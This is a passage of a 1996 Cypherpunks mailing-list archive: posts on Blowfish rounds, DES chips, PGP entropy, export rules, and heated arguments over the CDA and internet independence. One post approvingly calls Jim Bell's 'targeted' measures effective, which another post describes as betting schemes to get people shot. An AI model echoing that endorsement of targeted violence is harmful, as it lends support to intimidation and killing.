after the 3rd round, and after each two subsequent rounds (5, 7, 9, ...).
(I understand 'avalanche' to mean that each bit of the key has affected
each bit of the data being encrypted.  Do I understand correctly?)

He also mentioned the possibility of decreasing the number of rounds in
Blowfish from the current 16, in order to improve the speed.  My question
is, would it be sensible to do it with an odd number of rounds?  If 10
rounds were a consideration, then why not go on to 11 to get the 5th
complete avalanche?  Or perhaps it would suffice to stop after 9 rounds,
after the 4th complete avalanche?

Is a whole number of avalanches a desirable feature?  Would an odd number
of rounds throw a spanner into the key schedule?

Also, how would this relate to the modified algorithm, Blowfish-SK?

I think I have now made my lack of expertise amply apparent.  :-)

[ ObNoise: does it take Nukes to end the jim bell/Alan Olsen flamewar? ]
[ ObRating: this post is rated G because it does not contain the words
  shit, piss, fuck, cunt, cocksucker, motherfucker, or tits. ]

Hoping these are not stupid questions,

--
David R. Conrad, conrad@detroit.freenet.org, http://www.grfn.org/~conrad
Hardware & Software Committee : finger -l conrad@grfn.org for public key
Key fingerprint =  33 12 BC 77 48 81 99 A5  D8 9C 43 16 3C 37 0B 50
No, his mind is not for rent to any god or government.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: brianh@u163.wi.vp.com (Brian Hills)
Date: Mon, 12 Feb 1996 22:32:13 +0800
To: cypherpunks@toad.com
Subject: Mail at the office
Message-ID: <m0tlyMm-00025AC@u163.wi.vp.com>
MIME-Version: 1.0
Content-Type: text/plain


Hello;

I would like to know if there is anyway to keep a record of what is
happening on my machine at work.  I have had all my personal e-mail
deleted twice now over the weekend.  My employer has no problems with
the employees recieving non work related e-mail.  

I'm on a unix enviroment.  I have written a simple program to let me
know who logins on my machine, but it doesn't provide enough
information anymore.  I have talked with the sys.admin but he doesn't
know what to do either.  I have tried to find a sniffer thats already
compiled for i can not compile anything here, but have had no success.

Any help or pointers would be Greatly Apreciated
please reply by private e-mail so the noise level doesn't increase on
my account.

Sincerly,
Brian
brianh@u163.wi.vp.com

-- 
UNTIL WE MEET AGAIN :-)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Tue, 13 Feb 1996 03:13:00 +0800
To: Tim Cook <twcook@cts.com>
Subject: Re: A Cyberspace Independence Refutation
In-Reply-To: <m0tlrTi-000V6OC@mailhub.cts.com>
Message-ID: <Pine.SUN.3.91.960212074051.25041B-100000@crl6.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Sun, 11 Feb 1996, Tim Cook wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> 
> . . . I warn the net community not 
> to be caught acting like the teenager that has decided that mom & 
> dad know nothing and it doesn't matter that they cared for us all 
> these years.

I haven't followed this thread since the initial posting of
the Declaration, but this particular piece of shallow thinking
jumped out of the computer at me.

On sum, the people on the Net are the brightest, most 
sophisticated segment of our society.  Politicians, by 
contrast, are--on sum--the most venal of humans.  To liken
them to "parents" and the rest of us to teenage ingrates is
truly insulting.  An apology is in order from Mr. Cook.

Even assuming agruendo that the analogy applies, then the 
Declaration is still on the right track.  It's time to grow
up, leave our parents' house and move beyond their smothering
"care."  Grow up Tim Cook.  You've parked your feet under Mom
and Dad's table too long.  It's time to deal with your peers
and the rest of the world on your own, two, independent feet.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@UNiX.asb.com>
Date: Mon, 12 Feb 1996 21:34:47 +0800
To: cypherpunks@toad.com
Subject: Spin Control Alert (LI Newsday, 2/12/96)
Message-ID: <199602121313.IAA26828@UNiX.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


Know your enemies:

There's an op-ed in LI Newsday by Cathleen A. Cleaver ("directory of 
legal studies at the Family Research Council..." in LI Newsday today.

Serious pro-CDA spin here. Justifies the bust of Amateur Action BBS, 
ignoring that they were set up by the gov't, and then insists the CDA 
only prohibits making porn accessible to kids. Calls anti-CDA folx 
"free-speech zealots" and "friends of the porn industry", claims the 
courts can determine merit on a per-case basis, and claims objections 
to CDA are really from "arrogance and greed... Most Americans do not 
have access to the Internet. The on-line elite would like to keep it 
that way..."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@echeque.com
Date: Tue, 13 Feb 1996 08:20:17 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: A Cyberspace Independence Refutation
Message-ID: <199602121635.IAA11515@shell1.best.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:36 AM 2/12/96 -0500, lmccarth@cs.umass.edu wrote:
> I'm afraid I'm not willing to take [vulnerability of the state] on faith. 

You delete my arguments, and then say:  "I am not willing to take this on
faith", implying that I made no arguments.

> Strata made some good
> observations about the tangible vulnerability of the net-as-we-know-it to
> government intervention.

During the American revolution, the British troops could go where they
pleased, and destroy whatever they wished, but they could not obtain
political control by so doing.

Yes, we are vulnerable, and so are they.  If they used the measures
proposed by Strata, the measures proposed by Jim Bell would gather 
wide support.

Ob Crypto:

They cannot obtain political control by mere acts of destruction, because 
they cannot be sufficiently selective in who they silence.

For destruction to be effective, you must not only harm those who oppose
you, you must refrain from harming those who do not oppose you.  The
destructive acts proposed by Strata conspicuously fail to do this.

Under the extreme conditions that Strata envisages, the measures proposed 
by Jim Bell would be effective in obtaining politically desired consequences,
because they are selective and targeted, and the measures that Strata fears
would be ineffective in obtaining the politically desired consequences, 
because they are unselective and untargeted.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Mon, 12 Feb 1996 22:25:54 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: Reasons in support of crypto-anarchy WAS Re: Why am I (fwd)
In-Reply-To: <m0tlT1P-0008zzC@pacifier.com>
Message-ID: <199602121333.IAA18580@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



jim bell writes:
> If Perry is REALLY sincere about objecting to the NON-crypto part of AsPol,
> he should demonstrate this by writing notes which are focussing on the
> crypto aspects, rather than just complaining.

Frankly, Jim, the only reason I haven't torn apart all the utterly
ennervated simulacra of arguments you have posted to support your
"concepts" is that they are *all* off topic and I do not participated
in the discussion of off topic postings.

That does not, however, mean that I don't agree with the people who
think you are a loon, which is apparently a nearly universal
opinion.

Consider what I'm about to do kinder than using bets to encourage
someone to put a bullet in your brain, which is apparently your way of
solving all the world's problems.

PLONK.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bob bruen <bruen@wizard.mit.edu>
Date: Mon, 12 Feb 1996 22:55:21 +0800
To: "David K. Merriman" <merriman@arn.net>
Subject: Re: Req. for soundbites
In-Reply-To: <2.2.32.19960209130800.00688be4@arn.net>
Message-ID: <Pine.LNX.3.91.960212090537.928C-100000@wizard.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain



   For what it's worth department:

   The four letter words that are considered indecent are an anachronism
   from the days when the French/Normans ruled England, (~1066-1300's).
   A quick look at the words and their acceptable counterparts will make
   clear the issue. The four letter word are all of English derivation and
   the socially acceptable ones are of French (sometimes Latin) derivation.
   Even the term "four-letter" is a derogatory term for the English language
   in general, because the French considered English second rate because the
   words tended to be short, unlike French. Anyone who supports the suppression 
   of these words is merely enforcing the old French repression of the English 
   and the English language from over 500 years ago. Why think for yourself 
   when tradition can do it for you?

    eg:
      to piss  - to urinate
      to shit  - to deficate
      to fuck  - to copulate
      cunt     - vagina 
 
        etc.

     All of them, folks, all of them and easily checked out.


----------------
Bob Bruen
MIT 
Lab for Nuclear Science
77 Massachusetts Ave.
Cambridge MA 02139
voice: 617.253.6065
fax: 617.258.6591
-----------------------------------------------
On Fri, 9 Feb 1996, David K. Merriman wrote:
> A local TV station has asked me for an interview, after I sent a graphic 
of a mono-digital hand gesture with the phrase "censor this!" to the Prez, 
Veep, and the area congresscritters (cc'd to 2 TV stations and a radio 
station), accompanied by a 'confession' and demand for swift prosecution.
> Anyone got any nifty sound bites I can try to toss in?
> 
> Dave Merriman




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ed Carp <erc@dal1820.computek.net>
Date: Tue, 13 Feb 1996 01:50:31 +0800
To: Dave Emery <die@pig.die.com>
Subject: Re: A Cyberspace Independence Refutation
In-Reply-To: <9602120707.AA08292@pig.die.com>
Message-ID: <Pine.3.89.9602120919.A6693-0100000@dal1820.computek.net>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 12 Feb 1996, Dave Emery wrote:

> 	A lot of people forget the basic truth that the net is based
> almost entirely on physical communications facilities owned for the most
> part by huge corperations that have deeply incestuous relationships with
> the political power structure and very little interest in preserving the
> self important dreams of a few members of a self selected net "elite".  
> If ordered to pull the plug they will, and cyberspace as we know it will
> evaporate overnight.
> 
> 	And there is essentially no possibility of practical alternative
> communications facilities becoming available - aside from the titanic
> capital costs of creating such, most of the resources required such as
> radio spectrum, orbital slots and rights of way are tightly controlled by
> the entrenched corperations that operate the present facilities. 

> 	Unfettered, uncontrolled, uncensored  net access to anything
> like  the current wide cross section of the great washed, upper income,
> upper education sector of the population reached by the current
> Internet is a short term historical accident - there are too many
> powerful groups challenged and threatened by such for this period of 100
> flowers to last. 

Well, that's the way the net is *now* - but it wasn't always so.  I 
remember the days when the net was composed of a *lot* of point-to-point 
UUCP connections eventually winding up at the backbone.  People could be 
many hops away from the backbone and still have email and news access.  
True, there was no such thing as the web, nor TCP/IP, but we *did* have 
connectivity and communications.  If the Feds pulled the plug on the 
backbone, I can see that there are a lot of people who would drag UUCP 
and pathalias out of the closet, and the UUCP Mapping Project would live 
again (hams have their own backbone are would be not as severely affected 
by the backbone going away).

Not that it wouldn't be hard - but it's doable.
--
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
					214/993-3935 voicemail/digital pager
					800/558-3408 SkyPager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

"Past the wounds of childhood, past the fallen dreams and the broken families,
through the hurt and the loss and the agony only the night ever hears, is a
waiting soul.  Patient, permanent, abundant, it opens its infinite heart and
asks only one thing of you ... 'Remember who it is you really are.'"

                    -- "Losing Your Mind", Karen Alexander and Rick Boyes

The mark of a good conspiracy theory is its untestability.
		    -- Andrew Spring





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ed Carp <erc@dal1820.computek.net>
Date: Tue, 13 Feb 1996 02:45:22 +0800
To: Steve Willer <willer@carolian.com>
Subject: Re: Free end-to-end encryption code?
In-Reply-To: <311f5807.109332@saturn>
Message-ID: <Pine.3.89.9602120956.C6693-0100000@dal1820.computek.net>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 12 Feb 1996, Steve Willer wrote:

> As a side project, to support remote mail and news pickup through the
> Internet to my company's servers (through a firewall), I've been
> slowly writing an end-to-end encryption program. Essentially, the idea

Why reinvent the wheel?  Lots of end-to-end stuff out there - I use ssh, 
myself...
--
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
					214/993-3935 voicemail/digital pager
					800/558-3408 SkyPager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

"Past the wounds of childhood, past the fallen dreams and the broken families,
through the hurt and the loss and the agony only the night ever hears, is a
waiting soul.  Patient, permanent, abundant, it opens its infinite heart and
asks only one thing of you ... 'Remember who it is you really are.'"

                    -- "Losing Your Mind", Karen Alexander and Rick Boyes

The mark of a good conspiracy theory is its untestability.
		    -- Andrew Spring





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Wed, 14 Feb 1996 01:13:34 +0800
To: Ed Carp <erc@dal1820.computek.net>
Subject: Re: Regulation of citizen-alien communications (Was: Choices)
Message-ID: <2.2.32.19960212145316.00d93ccc@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:24 AM 2/11/96 +0000, Ed Carp wrote:

>> A foreign person is defined in S 120.11, and means anyone who's not a U.S.
>> citizen. Technical data is defined in S 120.33
>
>Oh?  You mean that I can get busted for giving my Canadian spouse a copy 
>of PGP?

A US *permanent resident* who is not a US Citizen is still a "US Person" for
ITAR purposes.

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Aldrich <maldrich@grctechs.va.grci.com>
Date: Tue, 13 Feb 1996 02:00:38 +0800
To: cypherpunks@toad.com
Subject: Availability of high-speed DES chips.
Message-ID: <Pine.SCO.3.91.960212095328.7080A-100000@grctechs.va.grci.com>
MIME-Version: 1.0
Content-Type: text/plain


I've got a networking application upon which I'm working that requires 
high-speed DES capability that can be clocked up to around 20 
megabytes/second.  We're going to have to do circuit board level design, 
so I can't plug a stand-alone box on the ass-end of the network device - 
it's got to be planted into our network controller.  This thing is going 
to provide ATM/SONET communications.

Does anyone know of any chip sets that can run at this speed?  Input 
regarding either commercial or R&D sources would be appreciated.  I know 
that two years ago at the Internet Security meeting in San Diego we saw a 
parallel processor configuration of DES chips, but I can't remember which 
University in North Carolina was working on this.  If anyone knows if 
this research went anywhere, I'd appreciate hearing about that as well.

Thanks for the help!

------------------------------------------------------------------------- 
|So, I went walking through the street.   |Mark Aldrich                 | 
|I saw you strung up in a tree.           |GRCI INFOSEC Engineering     | 
|A woman knelt there, said to me,         |maldrich@grci.com            | 
|Hold your tongue, man, hold your tongue. |MAldrich@dockmaster.ncsc.mil | 
|_______________________________________________________________________| 
|The author is PGP Empowered.  Public key at:  finger maldrich@grci.com |
|    The opinions expressed herein are strictly those of the author     | 
|         and my employer gets no credit for them whatsoever.           | 
-------------------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@symbolic.pr.it
Date: Mon, 12 Feb 1996 23:15:51 +0800
To: Bruce Schneier <schneier@winternet.com>
Subject: Re: Applied Cryptography, 2nd Edition --  Errata version 1.2
In-Reply-To: <199602090149.TAA00796@parka>
Message-ID: <311F0353.49E1@symbolic.pr.it>
MIME-Version: 1.0
Content-Type: text/plain


Bruce Schneier wrote:
> 
>                 APPLIED CRYPTOGRAPHY, Second Edition
> 
>                               ERRATA
>                    Version 1.2 - 1 February 1996
> 
> This errata includes all errors I have found in the book, including minor
> spelling and grammatical errors.  Please distribute this errata sheet to
> anyone else who owns a copy of the book.Could it be possible to have ISBN of the book, so that I can order it? I am 
definitely very interested.
Bye,

Fabrizio Cassoni




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lunaslide@loop.com
Date: Tue, 13 Feb 1996 08:27:22 +0800
To: jamesd@echeque.com
Subject: Re: A Cyberspace Independence Refutation
Message-ID: <v01530500ad4522b6d733@[206.138.118.125]>
MIME-Version: 1.0
Content-Type: text/plain


<rm>

}Your other arguments casually dismiss the very real power that large numbers
}of able people with good communications can exercise, have just exercised
}very recently.
}
}Nation states are a new creation.  In the past many different
}kings ruled many different bits of one nation, and one king often
}ruled parts of more than one nation.
}
}Today nation states are almost universal, and people can no longer
}imagine what a nation is, other than a nation state.  But the net
}is a nation, and is not a state, and nationalism is a force that
}governments usually cannot withstand.
<rm>

I'll just come out admit right now that I read Wired.  Yeah, sue me.  But
my point is that there was an article in 4.01 (January) on page 86 titled
"Is Government Obsolete?  Is the free market all we need to build a robust
and democratic political economy for the 21st century?"

I think the govt sees the beginning of the end.  They will not be
completely done away with, but they will lose the vast amount of power that
they now have and be reduced in size till they are functioning as a
mediator of disputes between this country and others, a regulator of some
laws involving ecology, labor laws, and so on.  But they will have lost
control over the direction of the nation.  Will the nation be able to be
cohesive without them?  I don't even think our concept of what a nation is
will be the same when that time eventually does come.

One think does stand to reason though, when govt gets in the way of
business, govt eventually gets run over.  Regulating the net in content
brings them one step closer to obsolescence.  The govt is not yet in it's
death throwes, but it has seen it's own fate.  The net regulation is one
more feeble attempt at avoiding destiny.  King Laius will not avoid his
fate by sending his son away this time, just like he didn't the first time.

"...We hold these truths to be self-evident, that all men are created
equal, that they are endowed by their Creator with certain unalienable
Rights, that among these are Life, Liberty and the pursuit of
Happiness.---That to secure these rights, Governments are instituted among
Men, deriving their just powers from the consent of the governed, ---That
whenever any Form of government becomes destructive to those ends, it os
the Right of the People to alter or abolish it, and to institute new
Government, laying it's foundation on such priciples and organizing it's
powers in such form, as to them shall seem most likely to effect their
Safety and Happiness.  Prudence, indeed,  will dictate that Governments
long established should not be changed for light and transient causes; and
accordingly all experience hath shown, that mankind are more disposed to
suffer, while evils are sufferable, than to right themselves by abolishing
the forms to which they are accostomed.  But when a long train of abuses
and usurpations, pursuing invariably the same Object evinces a design to
reduce them under absolute Despotism, it is their right, it is their duty,
to throw off such Government, and to provide new Guards for their future
security."

>From the Declaration of Independence, July 4, 1776.

lunaslide

"Prohibition... goes beyond the bounds of reason in that it attempts to
control a man's appetite by legislation and makes a crime out of things
that are not crimes... A prohibition law strikes a blow at the very
principles upon which our government was founded."
- -- Abraham Lincoln

On the meridian of time there is no injustice, only the poetry of motion
creating the illusion of truth and drama.
                                                Henry Miller
________________________________________________________________

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCPAzEX3QEAAAEEAOGQjhnqGH29pO1WDaXs5GFOVPhCBWyYEk9XEwRmscjveWzH
AhA6DeOA480zWNqQURyqE2yPmR8WzT+OXYqmeiQiycKyFA41Vs/Ruf+gXXxe7uXS
L5BK3K8oKbfoH0D5/TAkMT4r6BprXFQz4pFc3gY2SSaSPElpMjKHaKBsRsyRABEB
AAG0HUplZmYgQ29ubiA8bHVuYXNsaWRlQGxvb3AuY29tiQCVAwUQMRffHzKHaKBs
RsyRAQGNhwP9E9xEZ9/LCKnhgtnrqgD7pDoXG2pCy8FoyfFjoImGkG+jF1wELXmB
Z0mf8F8CgYkys0mif1XeGDMelr1gzlZAm6LgQt4kcvztMW/aRLn18QP+iwltVT/L
p8D37mitOjvuk46sWgAChIaPPPIeg/EaYQjQkmlpWKsEYIoTRy+E8mU=
=4Gku
-----END PGP PUBLIC KEY BLOCK-----








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lunaslide@loop.com
Date: Tue, 13 Feb 1996 07:58:35 +0800
To: die@die.com
Subject: Re: A Cyberspace Independence Refutation
Message-ID: <v01530501ad452b35d625@[206.138.118.125]>
MIME-Version: 1.0
Content-Type: text/plain


<rm>
}        A lot of people forget the basic truth that the net is based
}almost entirely on physical communications facilities owned for the most
}part by huge corperations that have deeply incestuous relationships with
}the political power structure and very little interest in preserving the
}self important dreams of a few members of a self selected net "elite".
}If ordered to pull the plug they will, and cyberspace as we know it will
}evaporate overnight.

Why should businesses cooperate with and help protect a govt that it's
needs would be better met without their existance?  Eve in the near future
during which busniesses will play by _most_ of the rules, those businesses
that own most of the net will not shut it down because it conflicts with
their business interests in a _major_ way.  Shutting down the internet for
even a day would loose these people so much money and time that if the govt
were to ask them to shut it down, they would seriously believe that they
are joking.  They would laugh, and the govt wouldn't be able to do shit
about it.

The net is something that has grown like ivy in an ivy-league school; it
can never be eradicated.  Too many people rely on it, it is too big an
income for big business and none of those businessed could shut it down
completely.  Routing errors, misplaced domains, sure, but the net would
survive and it would heal it's own wounds.


<rm>
}
}                                                A defeated pessimist,
}                                                die@die.com

I believe that most of us on this group are here because we have principles
that compel us to fight for our freedom and privacy.  For me, those
principles are strong enough that if to die fighting for them is my fate,
than that is how I will give my life.  To lay down my arms, to give up
before I'm dead or the war is over is to bring shame and dishonor upon
myself that I could not bear to live with.  I would never be able to look
my unborn children in the eyes again because I would know that I did not do
my part in the fight; I did not stand my ground.

BTW, I just turned 22 years old in January and if I hear anyone ,
especially anyone on this list, call my generation a bunch of slackers
again, I will seek you out, tie you to a chair and force you to watch every
episode of Guiligan's Island and The Brady Bunch five times each.

lunaslide

"Prohibition... goes beyond the bounds of reason in that it attempts to
control a man's appetite by legislation and makes a crime out of things
that are not crimes... A prohibition law strikes a blow at the very
principles upon which our government was founded."
- -- Abraham Lincoln

On the meridian of time there is no injustice, only the poetry of motion
creating the illusion of truth and drama.
                                                Henry Miller
________________________________________________________________

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCPAzEX3QEAAAEEAOGQjhnqGH29pO1WDaXs5GFOVPhCBWyYEk9XEwRmscjveWzH
AhA6DeOA480zWNqQURyqE2yPmR8WzT+OXYqmeiQiycKyFA41Vs/Ruf+gXXxe7uXS
L5BK3K8oKbfoH0D5/TAkMT4r6BprXFQz4pFc3gY2SSaSPElpMjKHaKBsRsyRABEB
AAG0HUplZmYgQ29ubiA8bHVuYXNsaWRlQGxvb3AuY29tiQCVAwUQMRffHzKHaKBs
RsyRAQGNhwP9E9xEZ9/LCKnhgtnrqgD7pDoXG2pCy8FoyfFjoImGkG+jF1wELXmB
Z0mf8F8CgYkys0mif1XeGDMelr1gzlZAm6LgQt4kcvztMW/aRLn18QP+iwltVT/L
p8D37mitOjvuk46sWgAChIaPPPIeg/EaYQjQkmlpWKsEYIoTRy+E8mU=
=4Gku
-----END PGP PUBLIC KEY BLOCK-----








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jon Lasser <jlasser@rwd.goucher.edu>
Date: Tue, 13 Feb 1996 04:38:27 +0800
To: Sten Drescher <stend@grendel.texas.net>
Subject: Re: Strange Sounds of Silence
In-Reply-To: <199602110307.VAA05228@grendel.texas.net>
Message-ID: <Pine.SUN.3.91.960212102532.15870A-100000@rwd.goucher.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 10 Feb 1996, Sten Drescher wrote:

> AP> Has anyone else out there noticed the strange sounds of silence
> AP> emmanating from the american print and broadcast media concerning
> AP> the rider attached to the Telecommunications Act recently signed
> AP> by President Clinton known as the CDA (Communications Decency
> AP> Act)?
> 
> 	Um, no.  I heard about it on CNN, NBC, and the San Antonio
> Express-News (in a New York Times Service article), the only
> non-online news sources I routinely check.  It appears to me that the
> sounds of silence are the only ones you want to hear.

Well, in the Washington Post story on the communications bill, (large 
though I don't remember how large... front page, more in the back), there 
were an entire two sentances about the Exon/CDA provisions.

Jon Lasser
------------------------------------------------------------------------------
Jon Lasser                <jlasser@rwd.goucher.edu>            (410)494-3072 
          Visit my home page at http://www.goucher.edu/~jlasser/
  You have a friend at the NSA: Big Brother is watching. Finger for PGP key.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Pete Loshin <pete@loshin.com>
Date: Tue, 13 Feb 1996 02:45:11 +0800
To: "medea@alpha.c2.org>
Subject: RE: Encryption software
Message-ID: <01BAF936.EF39C200@ploshin.tiac.net>
MIME-Version: 1.0
Content-Type: text/plain


Medea writes:

>  I was telling a friend that I was going to buy a program similar to PC Anywhere to be able to >communicate between my computer at home and the one at the office.  He suggested trying to find a >similar program which includes encryption.
>  Anyone know of such a program?

Norton pcANYWHERE and Stac ReachOut both claim to use encryption
though I don't have any details of what that encryption is.

However, if you use a direct telephone link to communicate, your need
for encryption would mostly be in the event that your telephone lines
were being tapped (though these products can also be used over most
network protocols including IP and IPX).

btw:

In general, when I speak with PC software vendors (product managers)
they almost always talk about how secure their products are but never
have the details (either, "oh, that's proprietary" or else "I'm not sure, I'll
have to get back to you on that...")

-Pete Loshin
 pete@loshin.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rngaugp@alpha.c2.org
Date: Tue, 13 Feb 1996 17:53:54 +0800
To: cypherpunks@toad.com
Subject: Using /dev/random for PGP key generation? Be Wary
Message-ID: <199602121556.KAA00211@miron.vip.best.com>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

Subject: Using /dev/random for PGP key generation? Be Wary

I have created a modified version of pgpi for use with a hardware random
number generators. Recently, there has been some confusion because
people have assumed that I wished people to use this version with
NOISE.SYS or an RNG that gathers entropy from timing events called
/dev/random.

I did indeed mention /dev/random in the readme file, but I did this only
because I thought /dev/random would be a likely path for a hardware RNG
on a unix system. ( I have never tested this software under unix, but I
see no reason why the "RNGDRIVER" feature of the modified PGPI would not
work under unix.)

Be assured that I originally planed the modification to be used with a
real hardware RNG. I tested it with the CALNET/NEWBRIGE RNG under DOS
and OS/2. The "RNGDRIVER" feature I tested with OS/2 and the driver in
RNG810.ZIP available at ftp.cdrom.com.

You may be able to compile and run it under other OSes as well. I see no
reason why not.


It is my understanding that NOISE.SYS gathers entropy from timing
certain events. I have recently learned that a /dev/random works under
Linux also by gathering entropy from timing.

I am unsure about using my modification, together with these drivers
that are not connected to a real hardware RNG. In what way would the use
of these drivers' methods of gathering entropy be superior to PGP's
method of getting entropy from keyboard timing? If you choose to do
something like this, you should think carefully and make a careful study
of the code.


One thought for the future: It would be nice if BBS'es that run
unattended could have a version of pgp that they could run without
worrying about running out of entropy! (Because no one is there to type
on the keyboard.) Perhaps something like NOISE.SYS (that would get
entropy from the COM ports) put together with my mod to pgpi could be
made to work. But careful thought an careful design should be done
first.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: cp850

iQCVAgUBMR63hs29s2mG+tTVAQFyKwP+Mh95ZNwwrBF+UjEKlEcfaiWY5ab8NthC
b3j4cmv9PUXLrCM4DUH2iXtY2f9YNN9GsWT1S1Eu2b0368VBkQTm1+eWcKiDVmlB
DumNmt4rZPhYam7wc/5gyGdIyzhGJBeJ0ZOP1kd4w0TfLsDprwKGOD1a0N7T3Ycz
gFqBX34x59s=
=MDXi
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@dorsai.dorsai.org>
Date: Tue, 13 Feb 1996 05:40:28 +0800
To: cypherpunks@toad.com
Subject: Put the Protest where your money is.
Message-ID: <Pine.SUN.3.91.960212105805.8214B-100000@dorsai>
MIME-Version: 1.0
Content-Type: text/plain


Here's an idea that come up while I and a good friend were in a well 
intoxicated and creative mood...

Every dollar you spend, be it a 1, 5, 10, 20, 50, or 100 denomination 
bill, write in a speech bubble to the president dude in the center, 
which says "I oppose the CDA.  Exon sucks.  Exon fornicates with 
male farm animals.  CDA Is unconstitutional, I roll in my grave over 
the CDA, etc."

Be creative; use the memo field in any checks you write to do the same.  
Money is the one element that travels from hand to hand to hand to hand.  
It is a network as extensitve as the internet itself, and even more so.

Let your money speak for you!  Put your url on the bill, or the url to 
the eff (http://mirrors.yahoo.com/eff/speech.html) or the Voter's Telecom 
Watch (http://www.vtw.org/)

Leave your pages black until this damnable blemish on our rights is 
repealed!

==========================================================================
 + ^ + |  Ray Arachelian |Emptiness is loneliness, and loneliness|  _ |>
  \|/  |sunder@dorsai.org|is cleanliness  and cleanliness is god-|  \ |
<--+-->|                 |liness and god is empty,  just like me,|   \|
  /|\  |    Just Say     |intoxicated  with the maddness,  I'm in|   <|\
 + v + | "No" to the NSA!|love with my sadness.   (Pumpkins/Zero)|   <| n
===================http://www.dorsai.org/~sunder/=========================


[This Bible excerpt awaiting review under the Communications Decency Act]
And then Lot said, "I have some mighty fine young virgin daughters. Why
don't you boys just come on in and do em right here in my house - I'll just
watch!"....Later, up in the mountains, the younger daughter said. "Dad's
getting old. I say we should do him." So the two daughters got him drunk and
did him all that night. Sure enough, Dad got em pregnant....Onan really
hated the idea of doing his brother's wife and getting her pregnant while
his brother got all the credit, so he whacked off first....Remember, it's
not a good idea to have sex with your sister, your brother, your parents,
your pet dog, or the farm animals. [excerpts from the Old Testament, Modern
Vernacular Translation, TCM, 1996] 







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "A. Padgett Peterson P.E. Information Security" <PADGETT@hobbes.orl.mmc.com>
Date: Tue, 13 Feb 1996 04:17:26 +0800
To: cypherpunks@toad.com
Subject: V-chips
Message-ID: <960212111330.20218f63@hobbes.orl.mmc.com>
MIME-Version: 1.0
Content-Type: text/plain


Bill rote:
>One thing the V-Chip gives us is the argument:  Now that parents have the
>ability to control what their children watch, the government should turn
>responsibility over to them and butt out.

Hmmm, thought - network TV is declining badly (I like AMC & Discovery 
channel myself). FCC rules are somewhat limiting and 5-year-old mentalities
rarely have much disposable income.

Cable is taking off because FCC restrictions do not apply. Would the
V-chip free the networks to allow *more* S&V^H^H^H"adult content" ? Where 
is the lobbying/money coming from ?
						Warmly,
							Padgett

ps still suspect that both the V-chip and CC are simple chip design changes 
   that do not need to add any cost.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 13 Feb 1996 04:17:48 +0800
To: cypherpunks@toad.com
Subject: COO_kie
Message-ID: <199602121615.LAA21849@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   2-12-96. FinTim:

   "This bug in your PC is a smart cookie."

      Netscape Navigator contains a little-known wrinkle that
      increases the power of companies to find out who their
      customers are and what they are up to. It allows
      companies to track which Web pages an individual looks
      at, when, for how long, and in what order. The
      information is stored on the customer's computer as
      "persistent client-state hypertext transfer protocol
      cookies".

   2-12-96. WSJ:

   "Consumer Privacy on Internet Goes Public."

      The advertising industry's response to the volatile
      issue of consumer privacy is drawing howls of protest
      from consumer advocates. The battle is over what should
      marketers be allowed to do with personal information
      they gather from consumers visiting Web sites. Marketers
